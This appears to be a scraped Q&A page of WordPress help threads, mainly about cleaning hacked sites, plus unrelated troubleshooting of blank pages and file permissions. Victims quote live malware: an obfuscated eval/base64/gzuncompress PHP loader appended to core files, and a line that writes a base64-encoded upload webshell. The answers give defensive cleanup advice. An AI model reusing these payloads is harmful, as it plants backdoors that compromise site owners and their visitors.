This question already has answers here:
My site is infected with obfuscated PHP malware - what is it doing + how do I get rid of it?
(6 answers)
Closed last month.
I have a problem with Wordpress. Someone infected my wordpress catalogue. Core, theme and plugins are up to date. In files xmlrpc.php, wp-trackback.php, wp-signup.php etc (all php files) on the end of file I have below code added: When I deleted this code from files, it appears again on the next few days :(
<?php $dAglL = 'b'.'ase64'.'_d'.'ecode'; $lufhp = 'st'.'r'.'_ro'.'t13'; $waAFR = 's'.'t'.'rrev'; $QIGep = 'g'.'zuncompre'.'ss'; error_reporting(0); ini_set('error_log', NULL); eval($QIGep($waAFR($lufhp($dAglL('Ybe8sAv+Lp/yHF8Pr8RC56Ojg5Pn4OE9/Eb52fC72dm++/FHST/38LWr0mQN8nJ9+mS+lQMJWRNi+USZZuiV2j52b4wgMBWPfKJmxrG17E+f6SaxJ3ivoflGsAu/6703vybErLfJQmLlQVXc78db/elewSr1gFxDPaGJ7SjM3/aUfqv74lJg4y28kw11HazGen6yrH6BvgbU6+vfh48d3SvU937N7vl7rt7Kk6C/7B7o3fSgPlf2ONA+ylH3wq+o2ZvQZ5NEenUflDSLSFvonUX3wPAcxcuP2sLv43y1h+EjnYx1XlzDDXi7E12Mas3qNdjGqbvkrsJ713e1Yto359fndL1a311EriwpwPufckfgXYvk2mTO3fvbuXhbaoG37JI4krfyar1vq3mUtO7ekbUeb/jHqviLYZoAuw29HslU7ZO9CYi5MYag6sosZrtB8NiwvuZNh2HffbQvbrzhPYAB9ldGHyHSW0j0m50uWXyZ5g/98yiceuwv9JGudmzepvTzp/3+NOXlK+cU6z4LdO/N+3Enq52tcmH7q+Y2ckES+rOqX0Sb8S15kdCVsoolYpNbcAHCFusKYfC7rvEsLXXP7J2gE10qxNrln5lfOPg8fjli9/dEh77Uhd5aG9YoGd4kQdHVISHIrjuYbxO8kssqnzSTBP79T2qmRG3yqut1r6E9lafQ+1PVIOsD6KHmmotnfBnxs7HutL2zk81csuud70xiX7/2WmHcP5FISrB38932XslE+bbHKH/kr3E99icNdq86xt62Aa3vGfUle85H+wVUArN6/9e2R2dYSczvllU/9M5BuO1kDbqnJMNNYZ+Jg2D7vAb+uPaH7BE5FfGKUGwjnkh08nel7Snuqij0CGWQ9P3Efjw+jMdBe2YA84gZ1Z0xktXFK/JZceToGv0WuU/42X/2mbqJ+CSvcb3stsdH3uJ643D3OEE5A/zXm3ybMVdwK41SuWDVcQ+q2NxX3+JRMT9rVvkhqYlK5q5kb53nxijA+UN+uy2+endfzNB9YGE+jdPHL77bb7Xlj5PEc7RijDjBrZqGhm2NeBE/ZeNwpWmyYS9xI8pfcLIX6ifffKa4dtapRpg71yBc437w/5QukGE6YqDHrTP2lrtAKGRT1lNpBVqQFzGK5rCP7pr8zpVUb0P/GisQDGEptfygX1QuqIzYVn46r1RK4GHGy/8TXoTYuxYjETyn9Z787B/Rt9lkbmC7HCH6CDLVx+4fwl/24fXG4kllDZecbtY2hd+phB/0k+Qcw66/Ba0L2pG2nMN1hdri7kzf2OyA5bE+fI+Tq3EfP0MwIfnkclrOfBtUXOgvXnB0aOOmG5zKlfIHU0mRr5J2gklUDjgSM6B25s+NAfnA0DkVVLwVzzmFj68bn8nxc3DimsiVQqA6xLwlNiqTIDYiu0uHoy9Lw7qC3ILRPuMC+STfMQ4xxxxmAM8Uz8SOgXYDVFNrb3cTELGNnfjTH8I8kHLgXwmapjlI8Y38Lm9NUyK5iScC6xhiikZAxhaTikbFEarEF4jfGV2Ohz0ZhtjiOX7jj4h5Xt+gmhp4EN0V8ft7Hr5g/FPjcrtwv0IFWQHDfdgMdsnrL2TXwcJut/ZbFu30CyuwfNiN7iuxnlu3b7R7T8zsBwN+ZWxB7wF54A555jgN6cnlumfyBsddg1UYdubb/Iho2XwFoyFvsi8j125xj2o/QkDzdGcTVYVhfwfm0Y/GZ+Nv9Rtm4+5rehhmjjq5sugfV14eItI+gmxk8g+kHwBtU5Awx8YN/HRDzny5sXLjPuI7xwc4+Q5pHSBgXnxki+grPcLoXG/ZxwdQDRO12WbdnwKyJzPZsOz7nZDncdn4COzGGitnsjMr2d55uBhl4fz/vp2dG3y+Ovk7fn6L+fw/r99Cud7eYWJ0tTvC9fT7se/NyeuLQvn615cP9a9qm9GXy9PqXq8mX1Hd4G7Tm8Hex/nrxvaetmXL4f67bXP597mTF4PdxY3fGCT9eP09YOT0xdf1taxbOWIr58O1z13qZTYuWVSS9T7N/sP9rGtojI+1jx/vKZmxHh7dmrk6f3VcSa6csXHl8y/DtY9UKeT1HGHp+f9xvXfetJ9z1v6OalbfXYLyaYX5i4u709ucCc7o9pXjdXaZxcXV6uj3uu9wpy+afax+mid2nzC9fj+8j8fZr+NRTbZx3ml27EkDBX27IeZs+c6G1j4f7nXTxQ73XTV37O3Zt+1wo/T362lt5fMXQU28vmXl03gD3b73Pl97uARSqbtWwbOavjg97vdq3/tZrpu2WxIGJdi5Ev6F001GgnVbNbmqdkGk3XmtR44pR0NK/xRTm2L/W+2caw=='))))); ?>
Do you have any idea what elements could have caused this security issue? Because you need to find the source of the problem, if not, no matter what you do, it might happen again.
However, here is what I suggest to you:
Backup all your website current data, files, database, etc.
You can completely reinstall all core files like wp-admin, wp-includes etc. The best solution will to reinstall a fresh WordPress, then import your backupped database and readd also your files in "wp-content"
Check your "uploads" directory, maybe the "hacker" installed a malicious file
Check your "wp_users" table to see if there is any unknown user, and also change your admin password
DON'T USE any cracked plugin, theme etc. maybe it is not your case, but I prefer to highlight it, because it is very important
You can also install this plugin to see what happens on your website, you will not see everything, but it can helps in some cases: https://wordpress.org/plugins/stream/
Related
I have a WordPress site (v5.2.3), and every now and again (possibly monthly) the wp-config.php and .htaccess files are over written with bad information.
This results in two problems - first the DB access details in wp-config are changed to something don't work, and then the ability to access my post-link permalinks are lost as a result of information being lost from htaccess.
After being overwritten, my wp-config file is full of lines like this:
file_put_contents("wp-remote-upload.php", base64_decode('PD9waHANCmVjaG8gIlRoaXMgc2hpdCB3b3JrcyEiOw0KaWYgKGlzc2V0KCRfRklMRVNbImZpbGVuYW1lIl0pKQ0Kew0KICAgaWYoJF9GSUxFU1siZmlsZW5hbWUiXVsic2l6ZSJdID4gMTAyNCozKjEwMjQpDQogICB7DQogICAgIGVjaG8gKCJGaWxlIHRvbyBsYXJnZSAobW9yZSB0aGFuIDNNYikiKTsNCiAgICAgZXhpdDsNCiAgIH0NCiAgIGlmKGlzX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1siZmlsZW5hbWUiXVsidG1wX25hbWUiXSkpDQogICB7DQogICAgIG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWyJmaWxlbmFtZSJdWyJ0bXBfbmFtZSJdLCAkX0ZJTEVTWyJmaWxlbmFtZSJdWyJuYW1lIl0pOw0KCSBlY2hvICgiPGJyPkRvbmUhPGJyPiIpOw0KICAgfSBlbHNlIHsNCiAgICAgIGVjaG8oIjxicj5FcnJvciEgIi4kcGhwX2Vycm9ybXNnLiI8YnI+Iik7DQogICB9DQp9DQo/Pg=='));
My wp-config file has so many of these lines that it is about 800Kb in size.
The plugins I am using on my WordPress site are as follows:
Akismet Anti-Spam [v4.0.1 by Automattic]
Contact Form 7 [v4.9.2 by Takayuki Miyoshi]
Duplicator [v1.2.3 by Snap Creek]
Google Analytics for WordPress [v7.7.1 by MonsterInsights]
Hello Dolly [v1.6 by Matt Mullenweg]
Limit Login Attempts [v1.7.1 by Johan Eenfeldt]
Logo Slider [v1.4.7 by EnigmaWeb]
Recent Posts Widget Extended [v0.9.9.7 by Satrya]
Squelch Tabs and Accordions Shortcodes [v0.4.1 by Matt Lowe]
WordPress Importer [v0.6.3 by wordpressdotorg]
Yoast SEO [v5.9.1 by Team Yoast]
Using my FTP program I have tried changing the permissions to the wp-config.php and .htaccess files so they cannot be written to - however my attempts to change these values have resulted in no changes. I am assuming I do not have the ability to change file permissions.
How do I stop these files from being over written?
Or how I can discover what is responsible for changing these files?
Looks like your system was compromised / hacked.
Suggest you start by googling what to do in such a case, there’s plenty of resources out there that cover the basics.
Ideally, you should probably delete all core WP and plugin folders, and upload the files again from a “clean” system (to avoid that other files that might have been inserted into your system can still be reached by the attacker from the outside.)
I would like to change the theme file through the Wordpress Admin Panel, in menu Appearance > Theme Editor, but I've got the message:
Something went wrong. Your change may not have been saved. Please try again. There is also a chance that you may need to manually fix and upload the file over FTP.
Everything was working correctly before I've made some changes in the file and upload it through the FTP back to the server. I am able to change every other file in Theme Editor, but this one. The rights are the same as in other files I am able to change, the owner and group are the same too. It looks that everything should work, but this and only this one file I have updated via FTP I am not able to change through the Theme Editor of Wordpress Admin Panel.
Any idea what could be possibly wrong? What I have done wrong? Please help me somebody, in the most of the time I am on the "safe" network, and the server FTP is not accessible from my computer.
Thank you.
Check Theme Permission
One of the first things you got to check the theme files and folder permissions.
If you are running on shared hosting then mostly it would be alright. However, if using VPS or Cloud then you got to ensure the same user owns theme files as web server (Nginx or Apache HTTP) running.
Modify File Permissions with chmod
FYR :- https://www.linode.com/docs/tools-reference/tools/modify-file-permissions-with-chmod/
Check Security Plugins
Are you using any security plugins? Do you have the option to check their logs to see how exactly your request is being treated?
Alternatively, you can quickly disable the security plugin and verify if that works.
I have finally solved the problem. There were two things with I have mislead my question.
The first one was that I wrote "Everything was working correctly before I've made some changes in the file and upload it through the FTP" and after that I wrote it again in the comment of the answer - I was so sure that I have tried the same file before, but I have not, it definitely was another one, I am sorry.
And the second was that I did not write specific file name. The file was includes/_wp_utils.php. Somebody would maybe notice that this is the biggest file in that directory. And that was the problem. I do not know why - maybe it was too big for server processing or something else (120KB), but I noticed it later, and I have tried to split the file to a few smaller files and I have included them into the includes/_wp_utils.php with the command include_once __DIR__ . '/_wp_utils/_nth_part_of_original_wp_utils.php';.
Thank you #G.D Udara Lahiru Sampath, I absolutely liked your answer. It was useful and very important to check.
My site got hacked and at every first line of php file i have line:
<?php $knitglx = '<%G]y6d]281Ld]245]K2 ... $knitglx=$fmfqhx-1; ?><?php (it is very long). Since i am using wordpress there are millions of files and it is impossible to open 1 by 1 and delete this line. Is there a way to delete them all at once?
I read something about some sed functions but i do not know how to use it and after some discussion i know that will not solve my problem so now i am looking a way how to scan and remove viruse from my files. Any help would be okay.
If your site got hacked you REALLY should not try to clean the source code they injected!. It is very likely that you will forget something and you may spread malware or whatever to the visitors of your WordPress site. Also try to figure out why you got hacked and fix the hole.
Make sure to delete all files from the server and change all your passwords (FTP, WordPress, etc. etc.).
Here is what you can do:
1) Contact your provider and ask them to setup the latest clean backup
2) Setup your own latest clean backup
3) If you really have no backup (which is very bad) do the following:
Make a fresh installation of WordPress.
download your wp-content folder and check this for any malicious code
download your database and check for any malicious code
place the clean code / database into the WordPress installation
Simple deleting the first line of each file is most probably not enough. However there are solutions to this:
Batch file to delete first 3 lines of a text file
Delete certain lines in a txt file via a batch file
Note: With an IDE like Netbeans or IntelliJ you can do a search / replace on a huge number of PHP files. This might also help if step three is the only option.
The third possibility is not good because it means a lot of work ... good luck!
I have a WordPress website that's been running for almost two years now. All of a sudden, it started to show a blank page on any public page. The admin part on /wp-admin is still working without any problems.
A http request is successful (status 200), but the returned content is completely empty (not even an tag).
I'm not really a PHP/WP expert. A simple web search got a lot of results, but mostly old stuff and never any clear conclusion of the problem's source, i.e. how to fix it. I already enabled WP_DEBUG in wp-config.php, but this only shows debug messages in wp-admin, but the public page remains blank.
Where should I continue searching?
The problematic website is http://lolkitten.org/.
Update
I just found index.php inside my public_html, which was empty. After writing something into it, it appears on my home page! Also, there's a directory /home/<user>/home/<user>/public_html/ which looks like complete nonsense to me.
Update 2
The Problem solved itself after upgrading to Wordpress 3.8. I don't know why, but it seems like some files (like index.php) were messed up and got replaced by fresh ones in this update.
Possible solution / workaround
I've had this problem again. This time, my index.php was completely empty. In my dashboard, under Dashboard > Updates, I clicked on Re-install Now and it fixed itself.
Most likely the wp-content folder can’t be found. When you login to the admin does it state that the templates can’t be found in red text in the center of the page right when you login?
I recommend going into your wp-config.php and adjust—or add—the following constants:
define('WP_SITEURL', 'http://lolkitten.org');
define('WP_HOME', 'http://lolkitten.org');
define('WP_CONTENT_DIR', '/path/to/your/wp-content');
define('WP_CONTENT_URL', 'http://lolkitten.org/wp-content');
Fairly confident that the key to fixing this will be the WP_CONTENT_DIR setting. You need the full path to the directory in the file system to your wp-content folder. So if you have a standard Unix setup with lolkitten.org in it’s own directory that path would be:
/var/www/lolkitten.org/wp-content
And the WP_CONTENT_DIR value would be:
define('WP_CONTENT_DIR', '/var/www/lolkitten.org/wp-content');
EDIT Adding info on how to determine your script’s absolute path if you do not have SSH access to the server, but have FTP access of some sort. Just FTP to the server & create a test file called test.php and just put the following code in it:
<?php
echo dirname(__FILE__);
?>
Now load that into your browser to get the full path:
http://lolkitten.org/test.php
__FILE__ is a magic constant in PHP that will echo the full/absolute path of a PHP script.
try deactivatinhg all the plugin once.
And if you can not access admin panel do the following to deactivate plugins
In the database - wp_options table
change the entry to a:0:{} on option ID 35- active_plugins
As far as i see error, it is because of share-buttons plugin.
Try removing share-buttons plugin from plugin folder and then check again.
If still problem exists then remove all active plugins and check again.
I too had same issue and it was because of plugin. I deactivated plugins one by one and my site was recovered from crash.
Here is my official WordPress forum support plea: http://wordpress.org/support/topic/headerphp-is-not-updating?replies=4
I changed all the permissions via FTP, currently set to 777. Originally 666, but that didn't work, so here we are.
I cleared all of my browser caches.
I added the following line to wp-config.php:
define('DISABLE_CACHE', true);
I don't know what else to do at this point. The file on my server reflects the changes I made, but if you look at the source on the website, via Firebug or whatever, it isn't there.
From the native WordPress editor, it says I can't edit the file because the permissions aren't set. What's really absurd is that this is a custom theme specifically for this website. Whose business is it if I want to change it?
Can anyone please at least verify that the correct 'header.php' is in wp-content/themes/themeofchoice?
EDIT: I don't know what happened but suddenly my changes have taken effect. I guess Wordpress takes hours to update .php files? WOW.
Thank you for your answers everybody. If anyone has similar problems, I guess take the same steps I did. If anything changed, I continued to change the permissions of all the parent folders as was suggested.